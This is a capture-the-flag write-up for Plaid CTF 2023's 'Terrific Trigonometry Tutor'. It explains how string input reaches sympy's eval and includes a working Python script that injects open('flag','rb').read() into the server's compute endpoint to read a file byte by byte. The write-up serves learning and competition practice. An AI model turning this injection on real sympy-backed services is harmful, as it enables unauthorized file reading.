# The Plaid Flag (Plaid CTF 2023) ## Terrific Trigonometry Tutor  This challenge gives us a website and a source code. The goal is to read the flag.   This "calculator" uses POST request and a JSON body to do the computing. Knowing nothing of this sympy library, I had to search the document and read it. And apparently sympy uses `eval` to many of it's functions so I just need to find a way to parse string into `sympy.simplify`. In `postfix_calculator` function, num type uses literal_eval which means I can parse string literals into the `compute` function. Testing in docker environment also confirms this.  Now to the actual server.  Unfortunately, reading the entire flag is not possible, so I had to read the flag character by character. ```python= import requests for i in range(100): body = [["num",f"\"open('flag','rb').read()[{i}]\""]] r = requests.post('http://ttt.chal.pwni.ng:1337/compute',json=body) print(chr(int(r.text.split('\\')[-1])),end='') ``` flag:  Also the `Ï` was supposed to be `π` so... Yeah ```pctf{what_be_a_pirate_math3maticians_favorite_food?_πzzarrrr___s9oolow2OOhchoh7xthi5Rae5}```